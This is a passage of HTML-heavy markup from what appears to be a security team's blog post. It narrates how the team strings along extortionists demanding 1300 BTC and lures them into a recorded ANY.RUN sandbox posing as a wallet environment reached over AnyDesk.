https://substackcdn.com/image/fetch/$s_!Bv5e!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png 1272w, https://substackcdn.com/image/fetch/$s_!Bv5e!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Bv5e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png" width="326" height="593.0520547945206" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c38b0295-1a5d-4387-93f1-3df4beffd2a3_730x1328.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1328,&quot;width&quot;:730,&quot;resizeWidth&quot;:326,&quot;bytes&quot;:488523,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc38b0295-1a5d-4387-93f1-3df4beffd2a3_730x1328.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Bv5e!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png 424w, https://substackcdn.com/image/fetch/$s_!Bv5e!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png 848w, https://substackcdn.com/image/fetch/$s_!Bv5e!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png 1272w, https://substackcdn.com/image/fetch/$s_!Bv5e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">He took the bait.</figcaption></figure></div><p>We got their interest, and their attention.</p><p>Now let&#8217;s find out what they want, how they want it, when they want it, and what they expect from us.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LUiG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LUiG!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!LUiG!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!LUiG!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!LUiG!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LUiG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png" width="326" height="579.8453333333333" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/63bb4a7c-5641-4d78-bc80-10cf18695d6e_750x1334.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1334,&quot;width&quot;:750,&quot;resizeWidth&quot;:326,&quot;bytes&quot;:801349,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63bb4a7c-5641-4d78-bc80-10cf18695d6e_750x1334.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!LUiG!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!LUiG!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!LUiG!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!LUiG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F72218370-df82-44b2-b8a3-7b4324414bfc_750x1334.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption"><em>&#8220;Can you specify the amount requested by the Presidency? We&#8217;ll confirm it with Treasury shortly, General&#8220; / &#8220;The required amount is 1300 BTC, which equals 89.5 million dollars&#8221;.</em></figcaption></figure></div><p>They name us a price, and we&#8217;ll play along with it. </p><p>Don&#8217;t worry, boys, we&#8217;ll bring you back home, even if it costs us 1300 BTC (roughly 89.5 million dollars). Let me get my wallet.</p><p>Or better yet, allow me to generate a <strong>secure internal environment</strong> with <em>access to our cold wallets</em>, so you can carry out the transaction yourself.</p><p>Help yourself. Take as much as you need.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6Bbd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6Bbd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!6Bbd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!6Bbd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!6Bbd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6Bbd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png" width="338" height="601.1893333333334" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8be47756-5fc5-4cc0-b6fb-2e68b9e44f1f_750x1334.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1334,&quot;width&quot;:750,&quot;resizeWidth&quot;:338,&quot;bytes&quot;:977679,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8be47756-5fc5-4cc0-b6fb-2e68b9e44f1f_750x1334.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6Bbd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!6Bbd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!6Bbd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!6Bbd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa26ed0a4-045c-4687-a9cf-5cda87b3321f_750x1334.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;We can set up a secure environment with access to a wallet containing the 1300 BTC. You may connect remotely using a secure tool like AnyDesk, and you&#8217;ll have unrestricted access to both the system and the wallet.&#8221;</figcaption></figure></div><p>We make them believe that, due to compliance restrictions, the only way to claim their nearly 100 million dollar bounty is by connecting via <strong>AnyDesk</strong> to a &#8220;<em>secure environment</em>&#8221;, which is actually an <strong><a href="https://any.run">ANY.RUN sandbox</a></strong>.</p><p>Once the threat actor connects to the environment, we can <strong>record every action</strong> and <strong>extract every piece of information from them</strong>, including their <strong>IP address</strong> and <strong>every single click they make</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!43GI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!43GI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!43GI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!43GI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!43GI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!43GI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png" width="336" height="597.632" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/afd5758a-aaf4-4285-9d50-0aecf7f9d227_750x1334.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1334,&quot;width&quot;:750,&quot;resizeWidth&quot;:336,&quot;bytes&quot;:678324,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd5758a-aaf4-4285-9d50-0aecf7f9d227_750x1334.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!43GI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!43GI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!43GI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!43GI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1bd5a733-4148-4b4d-ad92-c56b40572e51_750x1334.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;I just spoke with the President. We&#8217;ve already created five wallets dedicated to the payment. Each wallet will receive 260 BTC&#8221;.</figcaption></figure></div><p>The muppets try to bargain, claiming they&#8217;ve set up <strong>five wallets</strong> and asking us to <strong>transfer 260 BTC to each</strong>. But I am the negotiator here.</p><p>We politely decline, stating that due to <strong>compliance limitations</strong>, we must set up a <em>secure environment</em> where they must manually carry out the transactions <em>themselves</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!YLJQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!YLJQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!YLJQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!YLJQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!YLJQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!YLJQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png" width="338" height="601.1893333333334" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/202b3b1b-be57-4bfc-9ed5-7b0401f6d890_750x1334.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1334,&quot;width&quot;:750,&quot;resizeWidth&quot;:338,&quot;bytes&quot;:734891,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F202b3b1b-be57-4bfc-9ed5-7b0401f6d890_750x1334.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!YLJQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png 424w, https://substackcdn.com/image/fetch/$s_!YLJQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png 848w, https://substackcdn.com/image/fetch/$s_!YLJQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png 1272w, https://substackcdn.com/image/fetch/$s_!YLJQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa6c35f44-cd52-4d35-93da-522a7d249490_750x1334.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;I&#8217;ll inform the President. How long until you&#8217;re ready? Waiting for confirmation. I need to inform the Security Council of the exact timing&#8221;. / &#8220;One hour max, Sir General&#8221; / &#8220;Noted, I&#8217;ve informed the Security Council&#8221;</figcaption></figure></div><p>Now for the best part: we have a whole hour to set up <strong>tricks and traps</strong>.</p><p>In the past, we&#8217;ve managed to trap and tame professional threat actors like <strong><a href="https://quetzal.bitso.com/p/evilslack?utm_medium=web">EVILNUM</a></strong>, <strong><a href="https://phrack.org/issues/71/3#article">Labyrinth</a></strong><a href="https://phrack.org/issues/71/3#article"> </a><strong><a href="https://phrack.org/issues/71/3#article">Chollima</a></strong>, <strong><a href="https://quetzal.bitso.com/p/docks">Kimsuky</a></strong>, and <strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima">Famous</a></strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima"> </a><strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima">Chollima</a></strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima">.</a> All of them approached us and left <strong>recorded</strong>, <strong>mocked</strong>, and most importantly, <strong>empty-handed</strong>.</p><p>So we can definitely settle the score with these <em>threat stuntmen</em>. And, why not, make an <strong>example</strong> out of them.</p><p>An hour went by, and I had finished setting up our sandbox and laying down some <em>tripwires</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xtRN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf8dcb4d-a03b-4e52-8e07-22b94b0df990_750x1334.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 